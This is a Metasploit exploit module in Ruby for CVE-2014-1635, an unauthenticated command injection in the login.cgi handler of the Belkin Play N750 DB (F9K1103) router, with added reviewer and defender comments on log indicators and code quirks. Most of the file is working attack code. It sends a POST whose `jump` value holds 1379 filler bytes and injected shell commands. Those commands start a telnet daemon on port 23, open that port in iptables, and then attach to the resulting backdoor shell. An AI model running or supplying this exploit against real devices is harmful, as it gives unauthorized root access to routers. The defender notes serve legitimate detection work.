##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	# Metasploit exploit module for CVE-2014-1635: an unauthenticated command
	# injection in the login.cgi handler of the Belkin Play N750 DB (F9K1103)
	# firmware 1.10.16.m. The module POSTs a crafted `jump` parameter, then
	# connects to the telnet listener the injected command starts and, via
	# add_socket from Msf::Auxiliary::CommandShell, presumably registers that
	# socket as the session (confirm against the mixin).
	#
	# Defender notes: the observable indicator is an unauthenticated POST to
	# /login.cgi whose `jump` value is oversized and contains ';'-delimited
	# shell text, followed by a new listener on tcp/23 and new iptables rules
	# on the device.

	include Msf::Exploit::Remote::HttpClient
	include Msf::Auxiliary::CommandShell

	def initialize
		super(
			'Name'        => 'Belkin Devices Unauthenticated Remote Command Execution',
			# NOTE(review): the description text reads as truncated; the Name and
			# Targets entries carry the usable summary.
			'Description' => %q{
        Several Belkin routers firmware 1.10.16.m
      },
			'Author'      => 'Marco Vaz <mv[at]integrity.pt>', # Vulnerability discovery and Metasploit module development
			'License'     => MSF_LICENSE,
			'References'  =>
				[
					[ 'CVE', '2014-1635' ],
					[ 'URL', 'https://labs.integrity.pt/advisories/cve-2014-1635/' ]
        ],
      'DisclosureDate' => 'May 09 2014',
      'Privileged'     => true,
      'Platform'       => ['linux'],
      'Targets'        =>
        [
          ['Belkin Play N750 DB Wireless Dual-Band N+ Router, F9K1103,  firmware 1.10.16.m', {}],
        ],
      'DefaultTarget'  => 0,
      # Payload handler disabled: the session comes from the telnet socket
      # opened in #exploit, not from a Metasploit payload. Note the value is
      # the String 'true' rather than a boolean (truthy either way in Ruby).
      'DisablePayloadHandler'  => 'true'
      )
  end

  # Sends the injection request and, if the device then accepts a TCP
  # connection on the telnet port, registers that connection as the session.
  #
  # @return [void]
  # @raise whatever Rex::Socket.create_tcp raises on a failed connection —
  #   the `begin` block below has no rescue/ensure clause, so nothing raised
  #   there is handled in this method.
  def exploit
    telnetport = 23 
    print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}")
    # Injected command: starts utelnetd on telnetport and inserts iptables
    # rules permitting inbound tcp/23. On a compromised device the new
    # listener and these firewall-rule changes are the artefacts to look for.
    cmd = "/usr/sbin/utelnetd -p #{telnetport} -d;/usr/sbin/iptables -t nat -I FW_n_PR_GuestAccess 1 -p tcp --dport 23 -j ACCEPT;iptables -I INPUT 1 -p tcp --dport 23 -j ACCEPT"
    print_status("#{rhost}:#{rport} - Sending exploit request...")
    request(cmd)
    # NOTE(review): Rex::Socket.create_tcp is expected to raise on a failed
    # connection rather than return nil, so the else branch below is likely
    # unreachable and a failure surfaces as an unhandled exception — confirm.
    # (telnetport is already an Integer, so .to_i is a no-op.)
    begin
      sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
      if sock
        print_good("#{rhost}:#{rport} - Backdoor utelnetd service has been spawned...")
        # presumably registers sock as the CommandShell session — confirm
        add_socket(sock)
      else
        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Backdoor utelnetd service has not been spawned!!!")
      end
    end
    # Redundant explicit return; the method's value is not used.
    return
  end

  # Performs the unauthenticated POST to /login.cgi. The `jump` parameter is
  # built from 1379 filler bytes followed by `;cmd;`; the fixed filler length
  # makes the request highly distinctive in web-server logs.
  #
  # @param cmd [String] shell command text embedded in the `jump` value
  # @return the value returned by send_request_cgi (presumably nil when no
  #   response arrives — confirm)
  # @raise via fail_with on Rex::ConnectionError; fail_with is expected to
  #   raise rather than return, so the rescue path never reaches `return res`.
  def request(cmd)
    uri = '/login.cgi'
    jmp = "a"*1379
    jmp << ";"+cmd+";"
    begin
      res = send_request_cgi({
        'uri'    => uri,
        'method' => 'POST',
        'vars_post' => {
          "GO" => "",
          "jump" => jmp,
          "pws" => ""
          }
      })
    return res
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the web server minhttpd")
    end
  end

end
